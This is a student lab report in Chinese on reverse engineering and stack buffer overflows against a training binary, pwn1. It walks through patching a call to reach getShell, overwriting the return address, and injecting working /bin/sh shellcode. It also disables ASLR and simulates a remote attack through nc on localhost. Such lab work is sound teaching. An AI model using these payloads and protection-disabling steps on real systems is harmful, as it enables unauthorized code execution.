exp1 逆向与Bof基础实验报告

• exp1 逆向与Bof基础实验报告
  • 1 基础知识
    • 1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码:
    • 1.2 掌握反汇编与十六进制编程器
  • 2 逆向及Bof基础实践说明
    • 2.1 实践目标
  • 3 直接修改程序机器指令，改变程序执行流程
    • Ⅰ 实验步骤
    • Ⅱ 原理分析
  • 4 通过构造输入参数，造成BOF攻击，改变程序执行流
    • Ⅰ 实验步骤
    • Ⅱ.原理分析
  • 5 注入Shellcode并执行
    • Ⅰ 实验步骤
    • Ⅱ.shellcode地址
  • 6 结合nc模拟远程攻击
    • Ⅰ 实验步骤
    • 问题
  • 实验的收获与感想

1 基础知识

1.1 NOP, JNE, JE, JMP, CMP汇编指令的机器码:

• NOP：NOP指令即“空指令”。执行到NOP指令时，CPU什么也不做，仅仅当做一个指令执行过去并继续执行NOP后面的一条指令。（机器码：90），实验中我们构造滑行区就是用的这个机器命令x90。
• JNE：条件转移指令，如果不相等则跳转。（机器码：75）
• JMP：无条件转移指令。段内直接短转Jmp short（机器码：EB）段内直接近转移Jmp near（机器码：E9）段内间接转移Jmp word（机器码：FF）段间直接(远)转移Jmp far（机器码：EA）
• CMP：比较指令，功能相当于减法指令，只是对操作数之间运算比较，不保存结果。cmp指令执行后，将对标志寄存器产生影响。其他相关指令通过识别这些被影响的标志寄存器位来得知比较结果。

1.2 掌握反汇编与十六进制编程器

反汇编主要用的命令是

objdump -d 目标文件 | more

反汇编指令：
objdump -d：将代码段反汇编
"|" 管道符：命令A|命令B，即命令A的正确输出作为命令B的操作对象
more：使文件以一页一页的形式显示，更方便使用者逐页阅读

十六进制编程器

进入vi/vim编辑器后按esc后输入:%!xxd将显示模式切换为16进制模式
编辑完成后按esc后输入:%!xxd -r将转换16进制为原格式
或者
使用wxHexEditor编辑器
终端中键入sudo apt-get install wxhexeditor
最终结果如下图：

2 逆向及Bof基础实践说明

2.1 实践目标

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是：main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段，getShell，会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段，然后学习如何注入运行任何Shellcode。

三个实践内容如下：

手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数。
注入一个自己制作的shellcode并运行这段shellcode。
这几种思路，基本代表现实情况中的攻击目标:

运行原本不可访问的代码片段
强行修改程序执行流
以及注入运行任意代码。

3 直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
• 学习目标：理解可执行文件与机器指令
• 进阶：掌握ELF文件格式，掌握动态技术

Ⅰ 实验步骤

1.首先，我选择直接将pwn1文件拖至kali的桌面，随后右键，选择“在这里打开终端”。

2.然后进行反汇编。输入：

objdump -d pwn1 | more

3.通过/main找到main函数

4.直接修改可执行文件的指令使其弹出shell

cp pwn1 pwn2
vi -b pwn2

以下操作是在vi内
1.按ESC键
2.输入如下，将显示模式切换为16进制模式
:%!xxd
3.查找要修改的内容
/e8 d7(我这里操作e8和d7之间是有空格的，不然搜索不到)
4.找到后前后的内容和反汇编的对比下，确认是地方是正确的
5.修改d7为c3（键盘 i 进入编辑模式 ESC退出编辑模式 ）
6.转换16进制为原格式
:%!xxd -r(**这一步很关键啊，我第一次做就忘了把格式变回去，结果无法自行也无法反汇编**)
7.存盘退出vi
:wq

5.查看修改后的结果

objdump -d pwn2 | more

6.验证功能

./pwn2

Ⅱ 原理分析

"call 8048491 "是汇编指令
是说这条指令将调用位于地址8048491处的foo函数；
其对应机器指令为“e8 d7ffffff”，e8即跳转之意。
本来正常流程，此时此刻EIP的值应该是下条指令的地址，即80484ba。但遇到e8这条指令，CPU就会转而执行 “EIP + d7ffffff”这个位置的指令。
“d7ffffff”是补码,表示-41，41=0x29,80484ba +d7ffffff= 80484ba-0x29正好是8048491这个值。

main函数调用foo，对应机器指令为“ e8 d7ffffff”，
现在需要调用getShell，只要修改“d7ffffff”为，"getShell-80484ba（下条指令的地址）"对应的补码就行。
804847d-80484ba的补码为c3ffffff。
因此需要将call指令的目标地址由d7ffffff变为c3ffffff。

4 通过构造输入参数，造成BOF攻击，改变程序执行流

Ⅰ 实验步骤

1.构造并验证输入参数

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
xxd input

Perl是一门解释型语言，不需要预编译，可以在命令行上直接使用。 使用输出重定向“>”将perl生成的字符串存储到文件input中

2.运行验证
(cat input; cat) | ./pwn1

Ⅱ.原理分析

1.通过试验确定覆盖返回地址的位置

• 方法一：
  反汇编pwn1,分析预留空间大小
  objdump -b pwn1 | more
  

由上图可知，程序执行时先由main函数跳转到foo函数。
foo函数再获取字符前，先预留了0x1c的空间，转换为十进制也就是28字节的空间，这就是预留的缓冲区。
若输入的字符串超过28字节，则会覆盖ebp，其中ebp占4个字节，即使是这样也不妨碍程序正常执行，因为leave会将ebp弹栈，而且不影响eip的值。
若输入的字符串超过32字节，及已经越过ebp，覆盖了eip，那么程序的运行将会受到影响。
并且，eip存放了下一条指令的内存地址，那么，我们只需要在第33-36字节动手脚，将其改为想要执行的函数的内存地址，就达到了攻击效果了。

• 方法二：
  gdb碰撞

gdb pwn1
r
1111111122222222333333334444444455555555

通过观察可发现 eip寄存器被试验字符串中的5覆盖（0x35在ascii码中代表数字5），同理ebp寄存器被4覆盖，而其他寄存器看起来无异常，可以推测缓冲区预留了28字节空间，而28字节后的“44445555”分别覆盖了ebp寄存器和eip寄存器的值

2.验证eip覆盖的位置

r(紧接上一步，重新运行)
y
1111111122222222333333334444444412345678

通过观察可发现eip寄存器被“4321”覆盖，因此可以确定构造参数的第33字节到36字节会覆盖eip寄存器，因此只要将getshell的地址写入这四个字节就可以实现弹出shell,由于kali系统是小端系统，构造的输入参数为"11111111222222223333333344444444\x7d\x84\x04\x08\x0a"

5 注入Shellcode并执行

Ⅰ 实验步骤

• 这个项目开始之前先下载prelink命令：
  1.换源（已换的可以忽略此步）

cd /etc/apt
vim sources.list
把默认源换为中科大的源：
deb http: //mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 
deb-src http: // mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

2.更新

sudo apt update
sudo apt upgrade

3.下载prelink
sudo apt-get install prelink

如果无法定位软件包，可以去手动下载prelink的压缩包，安装

tar -xvf prelink_0.0.20130503.orig.tar.bz2
sudo apt-get install libelf-dev 
cd prelink
./configure
make
sudo make install

1.设置栈可执行
execstack -s pwn1

查询栈是否可执行 execstack -q pwn1

2.关闭地址随机化
echo "0" > /proc/sys/kernel/randomize_va_space

关闭地址随机化需在root用户下执行

"more /proc/sys/kernel/randomize_va_space"用于查询randomize_va_space的值，2为完全随机，0为关闭状态，"execstack -q pwn1"用于查询pwn1是否可执行，X为可执行

3.构造shellcode并执行

perl -e 'print "A" x 32;print "\x00\xf1\xff\xbf\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

xxd input_shellcode
(cat input_shellcode; cat) | ./pwn1

前四个字节0xbffff100是Shellcode的位置

Ⅱ.shellcode地址

1.在终端1运行pwn1

(cat input_shellcode;cat) | ./pwn1

input_shellcode前四字节可以用NOP填充

2.在终端2调试

ps -ef | grep pwn1
gdb
attach 33724
disassemble foo
break *0x080484ae
c
info r esp

得到pwn1的进程号为22652，利用GDB调试foo函数，在其返回地址设置断点，查看栈顶指针的值，加0x4即为shellcode的地址，即为0xbffff0fc+0x4=0xbffff100,填入shellcode的前四字节

6 结合nc模拟远程攻击

Ⅰ 实验步骤

1.主机1，模拟一个有漏洞的网络服务：

nc -l 127.0.0.1 -p 28234  -e ./pwn1

-l 表示listen, -p 后加端口号 -e 后加可执行文件，网络上接收的数据将作为这个程序的输入
将一个终端弄成服务器，也就是被攻击机

2.主机2，连接主机1并发送攻击载荷：

(cat input_shellcode; cat) | nc 127.0.0.1 28234

这里失败了，因为每次重开都会地址随机化，我也是分了几次做这个实验，导致前面一个小实验构造的Shellcode已经不适用了，需要重新构造Shellcode。
3.重新寻找Shellcode地址

上一个Shellcode地址是0xbffff100，这次是0xbffff130

问题

1.远程注入Shellcode我感觉太迷了，搞了好久也没有搞懂，先是搞两台电脑之间注入，从无法连接到拒绝访问到放弃，直接开两个终端。
尝试过关闭防火墙，改桥接模式并修改网卡都无济于事，我这可能是在绕弯子，并且连问题的关键都没有碰到。因为花费的时间太多，抽时间问问老师。

2.zsh: illegal hardware instruction nc -l 127.0.0.1 -p 28234 -e ./pwn1非法硬件指令？？？

实验的收获与感想

1.大三上选修过一门安全编程技术，没有提起兴趣去学习，所以这第一次实验是我真正了解了缓冲区溢出的底层原理，也是第一次感受到缓冲区溢出攻击的乐趣。
2.本次实验在操作过程中有一些粗心，比如在pwn2修改时，将其转换为16进制并修改后就直接开始反汇编和执行了，出现错误时没有第一时间看回指导书，而是想当然地去找是否是前面出错了，然后就放弃了。等再一次碰这个实验的时候认真看了实验指导书才拍脑惊呼：蠢得要死。所以，出现问题时，要第一时间研究实验指导书相关部分，看看有没有遗漏和错误，并且不能完全死板的依赖实验指导书（就比如刚刚那个错误，转为了16进制机器怎么执行嘛，机器是一个笨家伙呀，当然我也是。哈哈哈哈哈哈哈哈哈哈哈哈）
还有一点就是打补丁，下载安装包。下面要做的就是归纳出一个找安装包和补丁的方法或者网站，不能再盲目的一头栽进百度的各种无用消息中。还要总结出安装的Linux操作步骤及命令，整个一个过程应该是，先遇到问题，很快找到包，再一套行云流水的操作将其安装好。不能再做那么多无用功了。
3.实验就找一个充裕的时间一下子把它搞完，要不然电脑可能搞幺蛾子（比如为了安全地址随机化在重启的时候又打开了），要不然自己脑子抽风。实验状态真的蛮重要的，人机合一哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈。时间分散做实验对我来说还有一个缺点，就是事与愿违，每次感觉只剩一点点，下一次一会儿就搞完了，结果一遇到个错误就容易心态爆炸。所以呀，年轻人，不要想着图省事，不要看轻任何一件事。